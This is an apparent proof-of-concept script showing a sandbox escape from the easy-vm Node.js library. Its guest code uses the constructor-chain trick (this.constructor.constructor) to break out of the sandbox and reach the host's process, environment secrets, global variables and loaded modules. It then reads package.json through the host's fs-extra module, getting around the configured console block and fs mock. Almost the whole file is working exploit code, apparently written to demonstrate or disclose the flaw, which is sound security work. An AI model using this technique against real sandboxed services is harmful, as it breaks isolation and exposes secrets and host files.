easy-vm escape

index.js

/**
 * easy-vm sandbox escape
 */
const EasyVM = require("easy-vm")

// Create our new VM we want to exploit
const vm = new EasyVM({
  // We specifically don't allow our VM to use the console
  console: false,
  timeout: 6000,
  require: {
    builtin: ['fs'],
    mock: {
      fs: {
        // Add sample mock to show that this doesn't help
        readFile: () => {
          console.log("Nice try!");
        }
      }
    }
  }
});

// This could be some secret API key we add into the environment variables
process.env.secret_code = "I am a secret code for some API";
// We'll also add some global variable that we also shouldn't be able to access
global.secret = "don't access me!";

// Let's suppose we use a module like fs-extra in our code
// This will be useful inside our VM
const fs = require('fs-extra');

vm.run(`
  // We can easily access the console object
  const console = this.constructor.constructor('return this.global.console')();

  // We can easily access the current process and thus our env variables
  const process = this.constructor.constructor('return this.process')();
  console.log("Secret code is:", process.env.secret_code);
  
  // We can easily access global variables
  const global = this.constructor.constructor('return this.global')();
  console.log("Global var is:", global.secret);

  // We can also access the main module and from there we can access its submodules
  const modules = this.constructor.constructor('return this.process.mainModule.children')();

  // Find the fs-extra module from the list
  let module;
  for(const mod of modules) {
    if (mod.filename.includes("fs-extra")) {
      // We have found our fs-extra module!
      module = mod.exports;
    }
  }

  if (module) {
    // We can now use the module how we like
    module.readJSON('./package.json', 'utf8', (err, data) => {
      console.log("Got data from fs:", data);
    })
  } else {
    console.log("fs-extra not loaded");
  }
`);